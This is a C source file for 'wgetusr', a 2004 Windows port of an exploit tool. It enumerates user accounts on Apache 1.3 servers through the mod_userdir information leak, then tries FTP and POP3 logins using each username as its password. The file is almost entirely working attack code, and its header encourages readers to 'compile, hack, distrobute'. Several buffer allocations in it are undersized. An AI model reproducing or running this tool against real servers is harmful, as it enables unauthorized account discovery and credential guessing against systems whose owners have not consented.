/*------------------------------------------------------------------- * * Exploit: wgetusr.c Windows Version * Author: HighT1mes (John Bissell) * Date Released: July 21, 2004 * * --- Code ported to Windows with some added code, * based on getusr.c exploit by CoKi --- * * Description from CoKi: * ====================== * * This tool tries to find users in a Apache 1.3.* * server through wrong default configuration of * module mod_userdir. * * My Believe: * =========== * * I believe in the current state of the web right * now this information leak bug can be pretty nasty. * Once you have a couple login names on a system * there are many services the attacker can target * to attack and work his way into the target system * to get local access. * * Program Usage: * ============== * * Use: wgetusr [options] -h <host> -u <usrfile> * -h Host * -u Users file * Options * -f Try log on via FTP * -p Try log on via POP3 * * VC++ 6.0 Compilation Information: * ================================= * * First go on the net and get the getopt libs and header * file for VC++ 6.0 Here's a link... * * http://prantl.host.sk/getopt/files/getopt-msvs6.zip * * Now extract the libs into your standerd VC++ Lib directory, * and extract the getopt.h header file of course into the * Include directory. * * Now to compile make a new console app project, * then put this source file in the project. * Next goto Project->Settings. Then click on * the link tab then goto the input catagory. * Now add getopt.lib to the end of objects/librarys * modules text box. Then in the Ignore Librarys * text box type LIBCD.lib to ignore that lib and allow * compilation to complete because of getopt lib. * * Also you where you added getopt.lib to the * objects/librarys modules text box put ws2_32.lib * in that text box as well. * * Your all set compile, hack, distrobute, have fun! :) * *-------------------------------------------------------------------*/ #include <getopt.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <windows.h> #define DATAMAX 50 #define BUFFER 1000 #define TCPIP_ERROR -1 #define TIMEOUT 3 #define HTTP_PORT 80 #define FTP_PORT 21 #define POP3_PORT 110 void use(char *program); int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout); void vrfy_apache(char *host); void vrfy_vuln(char *host); int test_user(char *host, char *user); int trylogonFTP(char *host, char *user, char *pass); int mkconn(char *host, unsigned short port); int trylogonPOP3(char *host, char *user, char *pass); struct hostent *he; char **fuser; int sockfd; struct sockaddr_in dest_dir; int main(int argc, char *argv[]) { FILE *userlist; char c, *host=NULL, *ulist=NULL; char user[DATAMAX]; int ucant=0, flogged=0, plogged=0, optftp=0, optpop=0, stop=0; unsigned int cant=0, i, user_num; WSADATA wsaData; int result=0; printf(" =================================\n"); printf(" wgetusr exploit by HighT1mes\n"); printf(" Based on getusr.c code by CoKi\n"); printf(" =================================\n\n"); Sleep(1000); if(argc < 2) use(argv[0]); result = WSAStartup( MAKEWORD( 2,2 ), &wsaData ); if ( result != NO_ERROR ) { printf( "Error at WSAStartup()\n" ); return( EXIT_FAILURE ); } while((c = getopt(argc, argv, "h:u:fp")) != EOF) { switch(c) { case 'h': host = optarg; break; case 'u': ulist = optarg; break; case 'f': optftp = 1; break; case 'p': optpop = 1; break; default : use(argv[0]); break; } } if(host == NULL) use(argv[0]); if(ulist == NULL) use(argv[0]); printf(" [+] verifying list:\t"); if((userlist = fopen(ulist, "r")) == NULL) { printf("Failed\n\n"); exit(1); } while(!feof(userlist)) if('\n' == fgetc(userlist)) ucant++; rewind(userlist); printf("OK (%d users)\n", ucant); Sleep(1000); fuser = (char **)malloc(sizeof(ucant)); printf(" [+] verifying host:\t"); if((he=gethostbyname(host)) == NULL) { perror("Error: "); Sleep(1000); printf("\n"); exit(1); } printf("OK\n"); Sleep(1000); printf(" [+] connecting:\t"); if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) { printf("Closed\n\n"); Sleep(1000); exit(1); } printf("OK\n"); Sleep(1000); closesocket(sockfd); vrfy_apache(host); Sleep(1000); vrfy_vuln(host); Sleep(1000); user_num = 1; while(!feof(userlist)) { if(fgets(user, sizeof(user), userlist) == NULL) break; user[strlen(user)-1] = '\0'; if(test_user(host, user) == 0) { fuser[cant] = (char *)malloc(sizeof(user)); memcpy(fuser[cant],user,strlen(user)); memset(fuser[cant]+strlen(user),0,1); cant++; } system("CLS"); printf(" wgetusr exploit by HighT1mes\n\n"); printf(" [+] searching for system accounts, please wait...\n"); printf(" [+] processing user #%d\n", user_num); user_num++; } if(cant == 0) { printf(" no users found\n\n"); exit(1); } else { /* print out valid usernames found */ printf(" [+] scan results for %s:\n\n", host); for (i = 0; i < cant; i++) { printf(" found username: %s\n", fuser[i]); } } printf("\n"); if(optftp == 1) { stop = 0; printf(" [+] trying log on via FTP...\n"); printf(" [+] connecting:\t"); if(mkconn(host, FTP_PORT) == TCPIP_ERROR) { printf("Closed\n"); stop = 1; } if(!stop) { printf("OK\n"); closesocket(sockfd); for(i=0; i < cant; i++) { if(trylogonFTP(host, fuser[i], fuser[i]) == 0) { printf(" logged in: %s\n", fuser[i]); flogged++; } } if(flogged == 0) printf(" no users logged in\n"); } } if(optpop == 1) { stop = 0; printf(" [+] trying log on via POP3...\n"); printf(" [+] connecting:\t"); (stdout); if(mkconn(host, POP3_PORT) == TCPIP_ERROR) { printf("Closed\n"); stop = 1; } if(!stop) { printf("OK\n"); closesocket(sockfd); for(i=0; i < cant; i++) { if(trylogonPOP3(host, fuser[i], fuser[i]) == 0) { printf(" logged in: %s\n", fuser[i]); plogged++; } } if(plogged == 0) printf(" no users logged in\n"); } } printf("\n"); fclose(userlist); WSACleanup(); return 0; } void use(char *program) { printf("Use: %s [options] -h <host> -u <usrfile>\n", program); printf(" -h\tHost\n"); printf(" -u\tUsers file\n"); printf(" Options\n"); printf(" -f\tTry log on via FTP\n"); printf(" -p\tTry log on via POP3\n"); exit(1); } int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout) { int res, slen, flags; struct timeval tv; struct sockaddr_in addr; fd_set rdf, wrf; int iMode = 0; ioctlsocket(sfd, FIONBIO, &iMode); res = connect(sfd, serv_addr, sizeof(struct sockaddr)); if (res >= 0) return res; FD_ZERO(&rdf); FD_ZERO(&wrf); FD_SET(sfd, &rdf); FD_SET(sfd, &wrf); memset(&tv, 0, sizeof(tv)); tv.tv_sec = timeout; if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0) return -1; if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) { slen = sizeof(addr); if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1) return -1; flags = ioctlsocket(sfd, FIONBIO, NULL); iMode = flags & ~iMode; ioctlsocket(sfd, FIONBIO, &iMode); return 0; } return -1; } void vrfy_apache(char *host) { char buf[BUFFER], sendstr[DATAMAX]; printf(" [+] verifying Apache:\t"); if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n"); sprintf(sendstr, "HEAD / HTTP/1.0\n\n"); send(sockfd, sendstr, sizeof(sendstr), 0); memset(buf, 0, sizeof(buf)); recv(sockfd, buf, sizeof(buf), 0); if(strstr(buf, "Server: Apache")) printf("OK\n"); else { printf("NO\n\n"); exit(1); } closesocket(sockfd); } void vrfy_vuln(char *host) { char buf[BUFFER], sendstr[DATAMAX]; printf(" [+] vulnerable:\t"); if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n"); memset(sendstr, 0, sizeof(sendstr)); sprintf(sendstr, "GET /~root\n"); send(sockfd, sendstr, sizeof(sendstr), 0); recv(sockfd, buf, sizeof(buf), 0); if(strstr(buf, "403")) printf("OK\n"); else { printf("NO\n\n"); exit(1); } closesocket(sockfd); } int test_user(char *host, char *user) { char buf[BUFFER], sendstr[DATAMAX]; if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf(" Closed\n"); memset(sendstr, 0, sizeof(sendstr)); sprintf(sendstr, "GET /~%s\n", user); send(sockfd, sendstr, sizeof(sendstr), 0); recv(sockfd, buf, sizeof(buf), 0); if(strstr(buf, "403")) return 0; else return 1; closesocket(sockfd); } int trylogonFTP(char *host, char *user, char *pass) { char buf[BUFFER], *senduser, *sendpass; senduser = malloc(sizeof(user+6)); sendpass = malloc(sizeof(pass+6)); sprintf(senduser,"USER %s\n",user); sprintf(sendpass,"PASS %s\n",pass); if(mkconn(host, FTP_PORT) == TCPIP_ERROR) printf(" Closed\n"); memset(buf,0,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,senduser,strlen(senduser), 0); memset(buf,0,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,sendpass,strlen(sendpass), 0); memset(buf,0,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); if(strstr(buf, "230")) return 0; else return 1; closesocket(sockfd); } int mkconn(char *host, unsigned short port) { if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == TCPIP_ERROR) { perror("Error"); printf("\n"); exit(1); } dest_dir.sin_family = AF_INET; dest_dir.sin_port = htons(port); dest_dir.sin_addr = *((struct in_addr *)he->h_addr); memset(&(dest_dir.sin_zero), 0, 8); if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, TIMEOUT) == TCPIP_ERROR) { return TCPIP_ERROR; } return 0; } int trylogonPOP3(char *host, char *user, char *pass) { char buf[BUFFER], *senduser, *sendpass; senduser = malloc(sizeof(user+6)); sendpass = malloc(sizeof(pass+6)); sprintf(senduser,"USER %s\n",user); sprintf(sendpass,"PASS %s\n",pass); if(mkconn(host, POP3_PORT) == TCPIP_ERROR) printf(" Closed\n"); memset(buf,0,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,senduser,strlen(senduser), 0); memset(buf,0,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,sendpass,strlen(sendpass), 0); memset(buf,0,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); if(strstr(buf, "+OK")) return 0; else return 1; closesocket(sockfd); } /* EOF */
